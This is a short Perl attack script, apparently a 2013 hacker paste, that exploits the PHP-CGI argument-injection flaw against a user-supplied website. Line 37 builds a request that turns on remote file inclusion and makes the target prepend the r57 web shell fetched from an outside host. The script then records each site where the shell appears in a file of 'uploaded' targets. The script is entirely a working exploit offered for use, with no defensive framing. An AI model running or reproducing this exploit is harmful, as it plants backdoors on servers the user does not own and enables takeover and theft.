PHP CGI INJECTION V 0.1 - BY ME :)

1. #/!/usr/bin/perl
2. ##################################################################
3. #
4. #
5. # By Kyfx - 2013 ©
6. # Made in UK
7. # GREETZ TO ALL
8. # Twitter: @Kyfxsec
9. #
10. #
11. ##################################################################
12.  
13. use LWP::UserAgent;
14. use HTTP::Request;
15. use Term::ANSIColor;
16. my $ua = LWP::UserAgent->new();
17. $ua ->timeout(15);
18.  
19. print color("green"),
20. q{ Thank You
21. ====================================================
22. # PHP CGI INJECTION 0.1
23. # By Kyfx - 2013 ©
24. # Made in UK
25. # GREETZ TO ALL
26. # Kyfxsec -2013
27. ====================================================
28.  
29. Digital url site target
30. };
31. print " -->> ";
32.  
33. $site =<STDIN>;
34. chomp($site);
35.  
36. my $lol = "http://".$site if ($site !~ m/http:\/\//);
37. my $test .= $lol."/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://r57shell.net/shell/r57.txt%20-n";
38. my $request = HTTP::Request -> new (GET => $test);
39. my $resposta = $ua -> request ( $request );
40.  
41. if( $resposta -> content =~ /r57shell/ && $resposta -> content =~ /shell/ )
42. {
43. open(x,">>uploaded.txt");
44. print x "$lol\n";
45. close(x);
46. print "\n Site vulnerável -- Shell upada\n\n";
47. print color("red"), "[+] $test\n\n";
48.  
49. }
50.  
51. else {
52. print "\n\n O site $lol não está vulnerável. \n\n" ;
53. }